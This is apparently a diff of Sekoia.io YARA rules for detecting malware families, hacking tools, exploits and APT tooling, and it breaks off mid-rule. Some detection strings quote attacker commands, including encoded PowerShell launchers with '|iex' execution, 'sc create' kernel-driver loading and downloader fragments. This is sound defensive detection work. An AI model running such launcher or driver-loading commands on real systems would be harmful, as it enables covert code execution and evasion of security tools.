 		classification = "TLP:CLEAR"
 
 	strings:
-		$str01 = "set_WindowStyle" ascii
-		$str02 = "set_FileName" ascii
-		$str03 = "get_StartInfo" ascii
-		$str04 = "GetRandomFileName" ascii
-		$str05 = "DownloadFile" ascii
-		$str06 = "GetTempPath" ascii
-		$str07 = "ProcessStartInfo" ascii
-		$str08 = "System.Diagnostics" ascii
+		$ = "sc create aswArPot.sys type=kernel binpath=%s" ascii
+		$ = "sc start aswArPot.sys" ascii
+		$ = "[*] Enumerating target processes" ascii
+		$ = "[*] Entering main loop... " ascii
+		$ = "aswArPot.pdb" ascii
+		$ = "SeConvertStringSecurityDescriptorToSecurityDescriptor" wide
 
 	condition:
-		uint16( 0 ) == 0x5a4d and all of them and filesize < 10KB
+		uint16be( 0 ) == 0x4d5a and filesize < 1MB and filesize > 20KB and 6 of them
 }
-rule SEKOIA_Apt_Uta0178_Javascript_Inclusion_Strings
+rule SEKOIA_Exploit_Win_Cloudatlas_Cve_2018_0798 : CVE_2018_0798 FILE
 {
 	meta:
-		description = "Detects UTA0178 malicious inclusion strings"
+		description = "Detect RTF files used by CloudAtlas to exploit CVE-2018-0798"
 		author = "Sekoia.io"
-		id = "af816c35-1f00-47ea-86ee-c034607c625e"
-		date = "2024-01-12"
+		id = "fcff4bc7-fe88-4546-bb5b-f2a1c2f8b0a5"
+		date = "2022-11-15"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_uta0178_javascript_inclusion_strings.yar#L1-L23"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "d3fedf49417178df374d6ae20e57ffcfa00cb68a647769964c049d9a8e0f4958"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/exploit_win_cloudatlas_cve_2018_0798.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "1ed1009d77835f60834c20e61158b00ce7416ade8aa86c3314f4d8d1f6742fa0"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "CVE-2018-0798, FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
+		hash1 = "c2064c7f4826c46bc609c472597366fd"
+		hash2 = "e2281402c63d4b544b81678250d24e61"
+		hash3 = "a97fa135d7e42886bcfdacca0d96c047"
 
 	strings:
-		$s0 = ".value"
-		$s1 = "btoa("
-		$s2 = "https://"
-		$s3 = "new XMLHttpRequest();"
-		$s4 = ".send(null);"
+		$ = "6060606061616161616161616161616161616161" ascii nocase
+		$ = "FB0B00004bE8FFFFFFFFC35F83C71B33C966B908" ascii nocase
+		$ = "010f0d00ddd8d97424f4668137" ascii nocase
 
 	condition:
-		@s0< @s1 and @s1 < @s2 and @s2 < @s3 and @s3 < @s4 and @s4- @s0 < 350
+		uint32be( 0 ) == 0x7b5c7274 and all of them
 }
-rule SEKOIA_Backdoor_Powershellempire_Batlauchers : FILE
+
+rule SEKOIA_Loader_Win_Stealthvector : FILE
 {
 	meta:
-		description = "Detect BAT launchers for Empire"
+		description = "Detect the StealthVector malware, updated in July 2024"
 		author = "Sekoia.io"
-		id = "ad371665-ec59-45c8-9d99-2a675842c384"
-		date = "2022-04-15"
+		id = "ecf6421a-f492-43c4-9ed7-eb4724d24779"
+		date = "2021-08-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/backdoor_powershellempire_batlauchers.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "0453c739ad936b0cc5ed2e36ba4a011a90600b74ca23c08165c23a3e63fe60e9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/loader_win_stealthvector.yar#L4-L32"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "71ea017462bbb1891ef306d1e56dece5864885f5c8db5c50431ab085d37bda03"
 		score = 75
-		quality = 74
+		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-07-15"
 		classification = "TLP:CLEAR"
+		hash1 = "166b6dcdac31f4bf51e4b20a7c3f7d4f7017ca0c30fa123d5591e25c3fa66107"
+		hash2 = "ab56501167fe689fe55f6e6ddc3bb91952299bd5c3ef004b02bf1c3b4061c7cf"
+		hash3 = "0faddbe1713455e3fc9777ec45adf07b28e24f4c3ddca37586c2aa6b539898c0"
+		hash4 = "1c88150ec85a07c3db5f18c5eedcb0b653467b897af01d690ed996e5e07ba8e3"
+		hash5 = "ec10a9396dca694fe64366e0dab82d046cf92457f97efd50a68ceb85adef6b74"
 
 	strings:
-		$ = "powershell -noP -sta -w 1 -enc  SQB" nocase wide ascii
-		$ = "powershell -ep bypass -noP -sta -w 1 -enc SQB" nocase wide ascii
-		$ = "-nol -nop -ep bypass \"[IO.File]::ReadAllText('%~f0')|iex" nocase wide ascii
+		$s1 = "Global\\kREwdFrOlvASgP4zWZyV89m6T2K0bIno" ascii
+		$s2 = "Global\\v5EPQFOImpTLaGZes3Nl1JSKHku8AyCw" ascii
 
 	condition:
-		any of them and filesize < 1MB
+		uint16( 0 ) == 0x5A4D and 1 of them or pe.imphash ( ) == "0cd7b92b97ccc7e255df1f46b5299986" or pe.imphash ( ) == "be777e91e3c42ac62471cfb7239be471" or hash.md5 ( pe.rich_signature.clear_data ) == "fcc67611d136cce0e785029bbb879b45"
 }
-rule SEKOIA_Apt_Spikedwine_Malicious_Hta
+rule SEKOIA_Tool_Dogtunnel_Strings : FILE
 {
 	meta:
-		description = "Detects malicious HTA used by SPIKEDWINE"
+		description = "Detects Dog Tunnel based on strings"
 		author = "Sekoia.io"
-		id = "e4526142-d98a-bf35-9d2c-ca2e83638c4b"
-		date = "2024-02-29"
+		id = "00705613-6367-454f-b3f2-1e2b0a52459c"
+		date = "2024-03-14"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_spikedwine_malicious_hta.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "305896cde5d95c29de511541a961063730709d40d67a8788f084c17f181e3baf"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_dogtunnel_strings.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "04e7141e67ba841b0955b9e36c43be1f5b22e635b96d58b8b1b52fd507ddd929"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "<HTA:APPLICATION ID=" nocase
-		$ = "return _0x"
-		$ = "font-size: 18px;"
+		$ = "pipe.(*UDPMakeSession).doAndWait"
+		$ = "ikcp.ikcp_parse_fastack"
+		$ = "pipe.ListenWithSetting"
+		$ = "pipe.DialTimeoutWithSetting"
+		$ = "common.ReadUDP"
 
 	condition:
-		all of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and all of them and filesize < 10MB
 }
-rule SEKOIA_Luckymouse_Sysupdate_Loader : FILE
+rule SEKOIA_Apt_Turla_Comlook : FILE
 {
 	meta:
-		description = "Detects decryption routine prologue of sysupdate loader"
+		description = "Detects Class and Method names used inside ComLook"
 		author = "Sekoia.io"
-		id = "6007e846-d467-4d07-b345-e25191b7c8bc"
-		date = "2022-08-19"
+		id = "c3bf886b-f952-47f9-aff6-3cd74c27077d"
+		date = "2023-10-30"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/luckymouse_sysupdate_loader.yar#L1-L17"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "9d46b74d8e5f94ecd844cffcd6d0d29eb662374c1d6fbe87acf3c877e5f963b3"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/apt_turla_comlook.yar#L1-L31"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "882a2efda4c3888c34a2802797c9eac4ab8b96774f2eea19e586ff9c8adb9292"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248517,23 +249051,36 @@ rule SEKOIA_Luckymouse_Sysupdate_Loader : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = { DB D4 33 C9 66 B9 ?? ?? E8 FF FF FF FF }
+		$ClassName1 = "AgentConfig"
+		$ClassName2 = "CommandPerforming"
+		$MethodName1 = "CmdCommand"
+		$MethodName2 = "GetConfigCommand"
+		$MethodName3 = "GetFileCommand"
+		$MethodName4 = "PutFileCommand"
+		$MethodName5 = "SetConfigCommand"
+		$MethodName6 = "AgentProtocol"
+		$Log1 = "CONFIG_SERVERS_LIST_PARSING_ERROR" ascii wide
+		$Log2 = "GET_UIDS_TO_CHECK_PARSING_ERROR" ascii wide
+		$Log3 = "PAYLOAD_PARSING_FILEPATH_AND_FILE_ERROR" ascii wide
+		$Log4 = "COMMAND_EMPTY_ERROR" ascii wide
+		$Log5 = "IMAP_USERNAME_FORMAT_INCORRECT" ascii wide
+		$Log6 = "NO_MESSAGES_TO_RETRIEVE" ascii wide
 
 	condition:
-		uint16be( 0 ) == 0x4d5a and filesize < 1MB and all of them
+		uint16be( 0 ) == 0x4d5a and filesize < 10MB and any of ( $ClassName* ) and any of ( $MethodName* ) and any of ( $Log* )
 }
-rule SEKOIA_Infostealer_Win_Blustealer : FILE
+rule SEKOIA_Infostealer_Win_Mars_Stealer_Xor_Routine : FILE
 {
 	meta:
-		description = "Detect the BluStealer infostealer based on characteristic strings"
+		description = "Detect Mars Stealer based on a specific XOR routine"
 		author = "Sekoia.io"
-		id = "a56b3c12-9d83-4a0b-81e8-43332e64d599"
-		date = "2022-10-05"
+		id = "3e2c7440b2fc9e4b039e6fa8152ac8ff"
+		date = "2022-04-06"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/infostealer_win_blustealer.yar#L1-L29"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fc7c11a9ddd21228aa773da6054220211327727a87d48008b7edb202c48666d8"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/infostealer_win_mars_stealer_xor_routine.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "c7e65550a225431552e8a81bbce81dd66350021b6444c94fe7a37aa96712e9b1"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248541,91 +249088,78 @@ rule SEKOIA_Infostealer_Win_Blustealer : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$cha01 = "@top\\LOGGERS\\DARKCLOUD" wide
-		$cha02 = "===============DARKCLOUD===============" wide
-		$cha03 = "#######################################DARKCLOUD#######################################" wide
-		$cha04 = "fireballsabadafirebricksfisherboat" ascii
-		$cha05 = "Moonchild Pro2ductions" wide
-		$str01 = "\\Microsoft\\Windows\\Templates\\credentials.txt" wide
-		$str02 = "\\NETGATE Technologies\\BlackHawK\\Profiles" wide
-		$str03 = "SysWOW64\\winsqlite3.dll" wide
-		$str04 = "HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\RunOnce\\*RD_" wide
-		$str05 = "Expiry Date;" wide
-		$str06 = "SELECT c0subject, c3author, c4recipients, c1body  FROM messagesText_content" wide
-		$str07 = "http://www.mediacollege.com/internet/utilities/show-ip.shtml" wide
-		$str08 = "\\163MailContacts.txt" wide
-		$key_0 = {ba ?? ?? 40 00 8d 4?}
+		$xor = {8b 4d ?? 03 4d ?? 0f be 19 8b 55 ?? 52 e8 ?? ?? ?? ?? 83 c4 ?? 8b c8 8b 45 ?? 33 d2 f7 f1 8b 45 ?? 0f be 0c 10 33 d9 8b 55 ?? 03 55 ?? 88 1a eb be}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of ( $cha* ) and 4 of ( $str* ) and $key_0
+		uint16( 0 ) == 0x5A4D and $xor
 }
-
-rule SEKOIA_Wiper_Win_Caddywiper : FILE
+rule SEKOIA_Downloader_Win_Newsterminal : FILE
 {
 	meta:
-		description = "Detect CaddyWiper"
+		description = "Detect the PowerShell based downloader used by APT42 called NEWSTERMINAL"
 		author = "Sekoia.io"
-		id = "869d44ff-79fc-403d-a45d-d33712da5bd0"
-		date = "2022-03-15"
+		id = "2f9aae45-e3bd-4d87-b336-5d141738952b"
+		date = "2024-08-26"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/wiper_win_caddywiper.yar#L4-L37"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "01a9910b42f402398bbe84546074256f56b10fe0f8524a9a9723aebe43b26a14"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/downloader_win_newsterminal.yar#L1-L20"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "2b756515400d7e3b6e21ee3a83f313c8"
+		logic_hash = "45c6c2b5b3723bf3ed46c82e6a254547d8c8b3446bb2fa4b4f0fc8441731ae7e"
 		score = 75
-		quality = 80
+		quality = 78
 		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
-		hash1_upx = "b66b179eac03afafdc69f62c207819eceecfbf994c9efa464fda0d2ba44fe2d7"
-		hash1 = "ea6a416b320f32261da8dafcf2faf088924f99a3a84f7b43b964637ea87aef72"
-		hash2 = "a294620543334a721a2ae8eaaf9680a0786f4b9a216d75b55cfd28f39e9430ea"
 
 	strings:
-		$ = "NETAPI32.dll" ascii
-		$ = "DsRoleGetPrimaryDomainInformation" ascii
+		$ = "Start-Process -FilePath $takeownCommand -ArgumentList $takeownArgs -Wait -NoNewWindow"
+		$ = "function Download-And-Extract-Dll {"
+		$ = {24 69 63 61 63 6C 73 41 72 67 73 20 3D 20 24 64 65 73 74 69 6E 61 74 69 6F 6E 46 69 6C 65 50 61 74 68 2C 20 22 2F 67 72 61 6E 74 22 2C 20 22 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 73 3A 46 22 2C 20 22 2F 63 22 2C 20 22 2F 71 22}
+		$ = "$publicip=(iwr http://127.0.0.1:4040/api/tunnels"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and filesize > 5KB and filesize < 20KB and pe.number_of_sections == 3 and pe.number_of_resources == 0 and all of them or pe.imphash ( ) == "ea8609d4dad999f73ec4b6f8e7b28e55" or pe.imphash ( ) == "bae2d138abe43164fb5e95f313de3d14" or for any i in ( 0 .. pe.number_of_sections -1 ) : ( hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "f0d4c11521fc3891965534e6c52e128b" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "6be6e878d1e8fed277c5feaf60b57a19" or hash.md5 ( pe.sections [ i ] . raw_data_offset , pe.sections [ i ] . raw_data_size ) == "11f22fc72c3ca7dd6b874bda37c1fe82" )
+		1 of them and filesize < 30KB
 }
-rule SEKOIA_Downloader_Win_Donot
+rule SEKOIA_Tool_Lsass_Dump_Strings : FILE
 {
 	meta:
-		description = "Detect the DoNot's downloader malware. There are big binaries in downloader strings."
+		description = "Detects Lsass dump based on strings"
 		author = "Sekoia.io"
-		id = "31b153cc-a4b9-40a0-8bcb-ce1370645b4b"
-		date = "2023-03-20"
+		id = "bf024dc6-a1c8-4c3f-9bf8-8d246c129639"
+		date = "2024-09-09"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/downloader_win_donot.yar#L1-L19"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "f6a03e6cfda74c1fbb1e8939a66735498d604a821b8b51492c2c5c6a46a38b6e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/tool_lsass_dump_strings.yar#L1-L19"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		hash = "f4540f42902c068b9290239729c45324"
+		logic_hash = "7dfee9368297b3fd6c7f247a65b5344da0f5438c2145c5d53af48983d0d9a745"
 		score = 75
 		quality = 80
-		tags = ""
+		tags = "FILE"
 		version = "1.0"
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "001100000011000100110001001100000011000000110000001100010011000100110000001100010011000100110000001100010011000100110000001100010011"
-		$ = "01010011011011110110011001110100011101110110000101110010011001010101110001001101011010010110001101110010011011110111001101101111011001100111010001011100010101110110100101101110011001000110111101110111011100110101110001000011011101010111001001110010011001010110111001110100010101100110010101110010011100110110100101101111011011100101110001010101011011100110100101101110011100110111010001100001011011000110110000000000"
-		$ = "0101110001110011011110010111001101110100011001010110110100110011001100100101110001110010011101010110111001100100011011000110110000110011001100100010111001100101011110000110010100000000"
+		$ = "[SUCCESS] Successfully dumped core LSASS information for PID:"
+		$ = "[SUCCESS] All data dumped to "
+		$ = "[ERROR] Unable to dump process"
 
 	condition:
-		1 of them
+		uint16be( 0 ) == 0x4d5a and 3 of them
 }
-rule SEKOIA_Rat_Win_Konni_Rat : FILE
+rule SEKOIA_Spyware_And_Strongpity_Mobile_Backdoor : FILE
 {
 	meta:
-		description = "Detect the KONNI RAT DLL files (x32 and x64)"
+		description = "Detect the mobile backdoor using the name used in the certificate"
 		author = "Sekoia.io"
-		id = "032f1c79-6f03-4588-a4af-38b1f3ca1cb8"
-		date = "2023-09-26"
+		id = "58ceb85b-d94f-47b2-86e4-59bd41f4fea8"
+		date = "2023-01-16"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/rat_win_konni_rat.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "764e75d3e433a8784e826f436896c50c9622129412ff277b55ec9aaf1402ff5e"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/spyware_and_strongpity_mobile_backdoor.yar#L1-L15"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "9005fe938433223f32642f6bbf7c4c58f0b927a006e283c8b12f79103ec02cfc"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248633,30 +249167,23 @@ rule SEKOIA_Rat_Win_Konni_Rat : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = ".cab" wide
-		$ = ".zip" wide
-		$ = ".rar" wide
-		$ = ".ini" wide
-		$ = ".dat" wide
-		$ = "%s(%d)" wide
-		$ = "%s %s \"%s\"" wide
-		$ = "\\Temp\\" wide
+		$s1 = "Elizabeth Mckinsen0"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them and filesize > 60KB and filesize < 120KB
+		all of them and filesize > 2MB
 }
-rule SEKOIA_Hacktool_Dnscat2_Strings : FILE
+rule SEKOIA_Hacktool_Iox_Tunneling : FILE
 {
 	meta:
-		description = "Detects DNSCat2 based on strings"
+		description = "Detects IOX tunneling tool"
 		author = "Sekoia.io"
-		id = "9655cdd7-c7fe-4033-bdd9-bdfcfd2bf827"
-		date = "2022-02-25"
+		id = "45b31d67-95e9-405d-88ea-3f2006ef160a"
+		date = "2022-10-13"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/hacktool_dnscat2_strings.yar#L1-L22"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "40d906ca3a00f7d3e2f8d043dbbc77a2a57fd133f4812b863aec6d5a0f57a8c9"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/hacktool_iox_tunneling.yar#L1-L22"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "e15df032864799e282ee89402d22b82e5d4b8f469ec292575a1bcb78d24db012"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248664,30 +249191,29 @@ rule SEKOIA_Hacktool_Dnscat2_Strings : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$ = "Creating a exec('%s') session!"
-		$ = "RROR parsing --dns"
-		$ = "Got a ping request! Responding!"
-		$ = "[Tunnel %d] Received %zd bytes"
-		$ = "[Tunnel %d] connection to %s:%d"
-		$ = "You'll need to use --dns server=<server>"
-		$ = "Setting delay between packets to %dms"
+		$ = "iox/operate.Local2Remote"
+		$ = "iox/operate.Local2Local"
+		$ = "iox/operate.Remote2Remote"
+		$ = "iox/operate.ProxyLocal"
+		$ = "iox/operate.ProxyRemote"
+		$ = "iox/operate.ProxyRemoteL2L"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and 3 of them
+		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 5MB and all of them
 }
 
-rule SEKOIA_Yara_Runascs : FILE
+rule SEKOIA_Merlin_Linux_Elf : FILE
 {
 	meta:
-		description = "No description has been set in the source file - SEKOIA"
+		description = "Detects Merling agent (ELF)"
 		author = "Sekoia.io"
-		id = "1720f042-2cc6-4ef1-b66c-fe8a4214366a"
-		date = "2023-08-23"
+		id = "d9c57f5e-26c3-43be-b2cf-10f5129d3be6"
+		date = "2022-01-03"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/yara_runascs.yar#L3-L33"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "fe9b02704d07b5ebe6ad94283e4c1ec2846a54f5c1fb2115a1f6411cf8c19059"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/merlin_linux_elf.yar#L4-L34"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "f7edd517a575b54c9ee8acdc7a5ebac7c0c9eb286abc49e2962b02aad40e5973"
 		score = 75
 		quality = 80
 		tags = "FILE"
@@ -248695,102 +249221,92 @@ rule SEKOIA_Yara_Runascs : FILE
 		classification = "TLP:CLEAR"
 
 	strings:
-		$s1 = "RunasCs" ascii wide
-		$s2 = "LOGON32_LOGON_INTERACTIVE" ascii wide
-		$s3 = "LOGON32_LOGON_NETWORK" ascii wide
-		$s4 = "LOGON32_LOGON_BATCH" ascii wide
-		$s5 = "LOGON32_LOGON_SERVICE" ascii wide
-		$s6 = "dwLogonProvider" ascii wide
-		$s7 = "LogonUser" ascii wide
-		$s8 = "CreateProcessAsUser" ascii wide
+		$s1 = "github.com/Ne0nd0g/merlin" ascii
+		$s2 = "github.com/refraction-networking" ascii
+		$s3 = "SendMerlinMessage" ascii
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and filesize < 4MB and all of them and not ( pe.version_info [ "OriginalFilename" ] == "Atera.AgentPackages.CommonLib.dll" and for any sig in pe.signatures : ( sig.subject contains "CN=Atera Networks Ltd" and sig.issuer contains "CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1" ) )
+		uint32( 0 ) == 0x464c457f and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "80199718ff1821a3fe914cd2279ab3a0" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "7dea362b3fac8e00956a4952a3d4f474" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "d41d8cd98f00b204e9800998ecf8427e" ) and for any i in ( 0 .. elf.number_of_sections -1 ) : ( hash.md5 ( elf.sections [ i ] . offset , elf.sections [ i ] . size ) == "91476dafa5ef669483350538fa6ec4cb" ) and all of them and filesize < 15MB
 }
-rule SEKOIA_Apt_Cloudatlas_Init_Module_Virtualalloc : FILE
+rule SEKOIA_Miner_Lin_Xmrig_Strings : FILE
 {
 	meta:
-		description = "Find init module of CloudAtlas with params passed to VirtualAlloc"
+		description = "Detects XMRig ELF"
 		author = "Sekoia.io"
-		id = "299ed681-9d1f-4b47-8389-ff5a608f49d4"
-		date = "2023-09-19"
+		id = "2f99020b-424c-4433-860c-5e9ab4e1f1de"
+		date = "2022-09-08"
 		modified = "2024-12-19"
 		reference = "https://github.com/SEKOIA-IO/Community"
-		source_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/yara_rules/apt_cloudatlas_init_module_virtualalloc.yar#L1-L25"
-		license_url = "https://github.com/SEKOIA-IO/Community/blob/e00b1ef08f974e483260719ce04b78fa8b79ee56/LICENSE.md"
-		logic_hash = "31ffaeccc0b8fe36eea3b3a8200eff6a420b1a3937fd439dc84121654fcea502"
+		source_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/yara_rules/miner_lin_xmrig_strings.yar#L1-L36"
+		license_url = "https://github.com/SEKOIA-IO/Community/blob/fb46d75846c170609b3d8241401bb9482d4fa708/LICENSE.md"
+		logic_hash = "4946e5099d7d342c8cf6644146ffec8506e786a1d4de0b05ef039bcf2b0fdad2"
 		score = 75
 		quality = 80
 		tags = "FILE"
 		version = "1.0"
+		modification_date = "2024-01-04"
 		classification = "TLP:CLEAR"
-		hash1 = "02a1a9582f5ccf421b08c41c35049416b9cdefc9228daf6b38d95e9b0930cc5a"
-		hash2 = "c7f19c7c295c86867ea7fa4597ba0cebe12f751753866e7298fd5d84676facc3"
 
 	strings:
-		$chunk_1 = {
-        6A 40
-        68 00 30 10 00
-        8B 8D ?? ?? ?? ??
-        8B 51 50
-        52
-        6A 00
-        FF 15 ?? ?? ?? ??
-        }
+		$ = "XMRig "
+		$ = "pool_wallet"
+		$ = "IP Address currently banned"
+		$ = "rigid"
+		$ = "diff_current"
+		$ = "shares_good"
+		$ = "shares_total"
+		$ = "avg_time"
+		$ = "avg_time_ms"
+		$ = "hashes_total"
+		$ = "pool address"
+		$ = "ping time"
+		$ = "connection time"
+		$ = "daemon+wss://"
+		$ = "daemon+https://"
+		$ = "daemon+http://"
+		$ = "socks5://"
+		$ = "stratum+ssl://"
+		$ = "stratum+tcp://"
 
 	condition:
-		( uint32be( 0 ) == 0x7f454c46 or uint16be( 0 ) == 0x4d5a ) and $chunk_1 and filesize < 3MB
+		uint32be( 0 ) == 0x7f454c46 and filesize < 10MB and 7 of them
 }
-rule SEKOIA_Rat_Win_Dcrat_Qwqdanchun : FILE
+rule SEKOIA_Apt_Mustang_Panda_Nupakage : FILE
 {
 	meta:
-		description = "Find DcRAT samples (qwqdanchun) based on specific strings"
+		description = "Detects NUPAKAGE malware (only PDB, too much false positives)"
 		author = "Sekoia.io"
-		id = "8206a410-48b3-425f-9dcb-7a528673a37a"
-		date = "2023-01-26"
+		id = "bd62c220-addc-48e9-bd01-2eff687ac3ce"
+		date = "2023-03-24"
 		modified = "2024-12-19"
-		reference = "https://github.com/qwqdanchun/DcRat"
